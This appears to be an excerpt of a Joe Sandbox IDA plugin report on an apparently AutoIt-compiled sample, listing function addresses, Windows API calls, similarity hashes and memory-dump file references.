Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 203b21416f437627c4c9a6a4547305844568492df249ed9f487f25e3d9ae41c6
Instruction ID: 1b49525e867652fa3bbfce4d7561025e0b061d20e69f26d3b5f092aa27f5ae92
Opcode Fuzzy Hash: 203b21416f437627c4c9a6a4547305844568492df249ed9f487f25e3d9ae41c6
Instruction Fuzzy Hash: 87619A3050465AABCF11EF20C892EFF77A8EF45308F084519F99A5B296DB34E941CBB0

Function 00DC046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D47F41: _memmove.LIBCMT ref: 00D47F82

Part of subcall function 00DC10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DC0038,?,?), ref: 00DC10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DC0548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DC0588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00DC05AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DC05D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DC0617
RegCloseKey.ADVAPI32(00000000), ref: 00DC0624

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: d94d439e56b4ecf47dc2ea63997c55a92411dd5901c58a405fd7ce3be346d8fb
Instruction ID: 154be7190ba9e3042f033567874918e2d57a53da0d9c16051a766a3ad15848d6
Opcode Fuzzy Hash: d94d439e56b4ecf47dc2ea63997c55a92411dd5901c58a405fd7ce3be346d8fb
Instruction Fuzzy Hash: F2513631208201AFCB14EF64C885E6BBBE9FF89714F08491DF595972A2DB31E904DB72

Function 00DC5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00DC5A82
GetMenuItemCount.USER32(00000000), ref: 00DC5AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DC5AE1
GetMenuItemID.USER32(?,?), ref: 00DC5B50
GetSubMenu.USER32(?,?), ref: 00DC5B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00DC5BAF

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 38b691ed97559a2b57cdef1e968bec17369bf1c5ab736ac4fbff324692677da4
Instruction ID: 94fb2932a68eada8dbe944fc6487e3cb6490c3a3d9ff14d41613c65bea590094
Opcode Fuzzy Hash: 38b691ed97559a2b57cdef1e968bec17369bf1c5ab736ac4fbff324692677da4
Instruction Fuzzy Hash: 6A515C35A00616AFCF159F65D845EAEBBB5EF48310F1444A9F846A7351CB70BE818BB0

Function 00D9F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D9F3F7
VariantClear.OLEAUT32(00000013), ref: 00D9F469
VariantClear.OLEAUT32(00000000), ref: 00D9F4C4
_memmove.LIBCMT ref: 00D9F4EE
VariantClear.OLEAUT32(?), ref: 00D9F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D9F569

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 34a3debf9b921f3c1e001ce0cf62cef35b13853b2ff0d66f9c538ef2909245b4
Instruction ID: 715d709d5c4506994e46528e8a8266b1923ec8176cf97f133042e4ba9c178f3a
Opcode Fuzzy Hash: 34a3debf9b921f3c1e001ce0cf62cef35b13853b2ff0d66f9c538ef2909245b4
Instruction Fuzzy Hash: 31514BB5A0020AEFCF14CF58D884EAAB7B9FF4C354B15856AE959DB310D730E911CBA0

Function 00DA26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DA2747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DA2792
IsMenu.USER32(00000000), ref: 00DA27B2
CreatePopupMenu.USER32 ref: 00DA27E6
GetMenuItemCount.USER32(000000FF), ref: 00DA2844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00DA2875

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: d804c465617655cbe5f92caa39e658f5a25ecce734c26ac206b760959234a527
Instruction ID: 52f2c00934c96ab401242436b5a2abb270e029d09c98d0ac59015d04d85310b6
Opcode Fuzzy Hash: d804c465617655cbe5f92caa39e658f5a25ecce734c26ac206b760959234a527
Instruction Fuzzy Hash: 90518B70A00306EBDB24CF7EC988ABEBBF5AF46314F144169F8519B290D7748904CB71

Function 00D41765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00D4179A
GetWindowRect.USER32(?,?), ref: 00D417FE
ScreenToClient.USER32(?,?), ref: 00D4181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D4182C
EndPaint.USER32(?,?), ref: 00D41876

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 1bb0df3703ab51f025c713ede01a16f613efce7364aa79e5eb833afcc2fe8e79
Instruction ID: dd8a5446ab672cd74d4764bd1737276ce34d55b542ca02b1261731061be1d104
Opcode Fuzzy Hash: 1bb0df3703ab51f025c713ede01a16f613efce7364aa79e5eb833afcc2fe8e79
Instruction Fuzzy Hash: FD41AC74100302AFD711DF25CC85FBA7BE9EB49724F084629F998CB2A1D7719889DB71

Function 00DCB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00E067B0,00000000,01155980,?,?,00E067B0,?,00DCB862,?,?), ref: 00DCB9CC
EnableWindow.USER32(00000000,00000000), ref: 00DCB9F0
ShowWindow.USER32(00E067B0,00000000,01155980,?,?,00E067B0,?,00DCB862,?,?), ref: 00DCBA50
ShowWindow.USER32(00000000,00000004,?,00DCB862,?,?), ref: 00DCBA62
EnableWindow.USER32(00000000,00000001), ref: 00DCBA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00DCBAA9

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: ade5398012104e47fa6807310631f2cbda2b69366925891e7442c46892cb6553
Instruction ID: 5385d93147fbb49a2b1e61bae41e2e504921ac67c2a6c3f69577e69e020183a4
Opcode Fuzzy Hash: ade5398012104e47fa6807310631f2cbda2b69366925891e7442c46892cb6553
Instruction Fuzzy Hash: 8A412234600642AFDB25CF54C48AF957BE1BB05324F1C42AEFA49DF6A2C771D845CB61

Function 00DB73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00DB5134,?,?,00000000,00000001), ref: 00DB73BF

Part of subcall function 00DB3C94: GetWindowRect.USER32(?,?), ref: 00DB3CA7

GetDesktopWindow.USER32 ref: 00DB73E9
GetWindowRect.USER32(00000000), ref: 00DB73F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00DB7422

Part of subcall function 00DA54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA555E

GetCursorPos.USER32(?), ref: 00DB744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DB74AC

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: fd31c1c84742ce506fba4605f9a4618283ff606139d549c38c52a43394a07175
Instruction ID: f4aded377b57f275aa3aa6710b7a23435e5b91ec0a73dc70e247908e21c9cba1
Opcode Fuzzy Hash: fd31c1c84742ce506fba4605f9a4618283ff606139d549c38c52a43394a07175
Instruction Fuzzy Hash: 3B31B672508306ABD720DF54D849F9BBBAAFF89314F000929F585D7191C670E909CBA2

Function 00D98D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D985F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D98608
Part of subcall function 00D985F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D98612
Part of subcall function 00D985F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D98621
Part of subcall function 00D985F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D98628
Part of subcall function 00D985F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D9863E

GetLengthSid.ADVAPI32(?,00000000,00D98977), ref: 00D98DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D98DB8
HeapAlloc.KERNEL32(00000000), ref: 00D98DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00D98DD8
GetProcessHeap.KERNEL32(00000000,00000000,00D98977), ref: 00D98DEC
HeapFree.KERNEL32(00000000), ref: 00D98DF3

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 9b83cc4fc4646da417a5602a056dc9c35c4952fad72f66220e3c4e82b277347c
Instruction ID: ada8ed3a4dd22c9917256de51c2c7406d6462ae38e9d4f7b83b7506616693895
Opcode Fuzzy Hash: 9b83cc4fc4646da417a5602a056dc9c35c4952fad72f66220e3c4e82b277347c
Instruction Fuzzy Hash: 25119D31601706EFDF109B64CC09FAE7BAAEB56715F184029E885D7251DB369904EB70

Function 00D98AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D98B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00D98B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00D98B40
CloseHandle.KERNEL32(00000004), ref: 00D98B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D98B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00D98B8E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 7d5ecfb9ccc5d49a43d64540c983271d1e3d758b1f759e2a1afd7261ca951103
Instruction ID: 2108f3ded902581c30103434b97c7e5853d9db4865301eb1161011fe2a764ab6
Opcode Fuzzy Hash: 7d5ecfb9ccc5d49a43d64540c983271d1e3d758b1f759e2a1afd7261ca951103
Instruction Fuzzy Hash: 16115CB250020AABDF018FA4DD49FDA7BA9FF09708F084065FE04E2160C7729D61AB70

Function 00DCC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00D412F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D4134D
Part of subcall function 00D412F3: SelectObject.GDI32(?,00000000), ref: 00D4135C
Part of subcall function 00D412F3: BeginPath.GDI32(?), ref: 00D41373
Part of subcall function 00D412F3: SelectObject.GDI32(?,00000000), ref: 00D4139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00DCC1C4
LineTo.GDI32(00000000,00000003,?), ref: 00DCC1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DCC1E6
LineTo.GDI32(00000000,00000000,?), ref: 00DCC1F6
EndPath.GDI32(00000000), ref: 00DCC206
StrokePath.GDI32(00000000), ref: 00DCC216

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 41020f462f5c62714e676a3a79bd6d4ad539870b1bbc021edbb8333edb52420d
Instruction ID: a70340a41573d3acd0b6a54b851dbfff83e6b6821516b4a5a0364f66ddbbab0c
Opcode Fuzzy Hash: 41020f462f5c62714e676a3a79bd6d4ad539870b1bbc021edbb8333edb52420d
Instruction Fuzzy Hash: 0811F77640020EBFDB119F91DC88FEA7FADEB08354F048025BA189A1A1C7729D95DBB0

Function 00D603A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D603D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 00D603DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D603E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D603F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00D603F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D60401

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 26bef04d467e16e98eff7f081fe100032042ff12582e994e4f8b43fea371b2d5
Instruction ID: 724f31bd74c7f128cec7b8fd7575ec4cd65346c7cc980d2ab599e8a75d5d5df9
Opcode Fuzzy Hash: 26bef04d467e16e98eff7f081fe100032042ff12582e994e4f8b43fea371b2d5
Instruction Fuzzy Hash: A9016CB094175A7DE3008F5A8C85B52FFA8FF19354F00411BA15C87A41C7F5A864CBE5

Function 00DA568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DA569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DA56B1
GetWindowThreadProcessId.USER32(?,?), ref: 00DA56C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DA56CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DA56D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DA56E0

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 9b4e9982dd6126c8b1d9e529406ed8814b6a4916abcd705f93d32d0f58b104ac
Instruction ID: 070135f5365af0321d5db716e4db6a64b7165300169c4edcb0ba1d45b2da06ff
Opcode Fuzzy Hash: 9b4e9982dd6126c8b1d9e529406ed8814b6a4916abcd705f93d32d0f58b104ac
Instruction Fuzzy Hash: 95F0303224165BBBE7215BA2EC0DEEF7B7DEFC6B11F040169FA04D1150D7A11A0186B5

Function 00DA74D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00DA74E5
EnterCriticalSection.KERNEL32(?,?,00D51044,?,?), ref: 00DA74F6
TerminateThread.KERNEL32(00000000,000001F6,?,00D51044,?,?), ref: 00DA7503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00D51044,?,?), ref: 00DA7510

Part of subcall function 00DA6ED7: CloseHandle.KERNEL32(00000000,?,00DA751D,?,00D51044,?,?), ref: 00DA6EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00DA7523
LeaveCriticalSection.KERNEL32(?,?,00D51044,?,?), ref: 00DA752A

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: c9037b2f35993ec81c691f8baeb39ea919d4fec4b5157f426eabc9aea422b52b
Instruction ID: 199ca38ef7b20425ff5867adb297774f05e97c2995abb02e173e2ae6f27b0ba1
Opcode Fuzzy Hash: c9037b2f35993ec81c691f8baeb39ea919d4fec4b5157f426eabc9aea422b52b
Instruction Fuzzy Hash: 52F03A3A540713EBDB121B64EC88DEAB72AEF45302B040532F242D11A0CB755901CA74

Function 00D98E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D98E7F
UnloadUserProfile.USERENV(?,?), ref: 00D98E8B
CloseHandle.KERNEL32(?), ref: 00D98E94
CloseHandle.KERNEL32(?), ref: 00D98E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00D98EA5
HeapFree.KERNEL32(00000000), ref: 00D98EAC

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: f12604e5deed2098f6a9fb49c9c9394e32abc75de0dac6bb822c648adf54c105
Instruction ID: 6af029198fa5912a0ff705927ae8496d6fff6df8ace3b90522814cba6e9c5a7f
Opcode Fuzzy Hash: f12604e5deed2098f6a9fb49c9c9394e32abc75de0dac6bb822c648adf54c105
Instruction Fuzzy Hash: 98E05976104607FBD6011FE5EC0CD95BB6AFB997627544631F215C1670CB326461DB60

Function 00DB8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00DB8928
CharUpperBuffW.USER32(?,?), ref: 00DB8A37
VariantClear.OLEAUT32(?), ref: 00DB8BAF

Part of subcall function 00DA7804: VariantInit.OLEAUT32(00000000), ref: 00DA7844
Part of subcall function 00DA7804: VariantCopy.OLEAUT32(00000000,?), ref: 00DA784D
Part of subcall function 00DA7804: VariantClear.OLEAUT32(00000000), ref: 00DA7859

Strings

Incorrect Parameter format, xrefs: 00DB8960, 00DB8B22
AUTOIT.ERROR, xrefs: 00DB8A3D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 00e65a3e09a22e70c7898e1148a41bf87f394f6682a48a1629d4516187857ae3
Instruction ID: a14dafd7b02b8b18fffe6b1188bd8cfa20e35ef869a081e6022b816172c15379
Opcode Fuzzy Hash: 00e65a3e09a22e70c7898e1148a41bf87f394f6682a48a1629d4516187857ae3
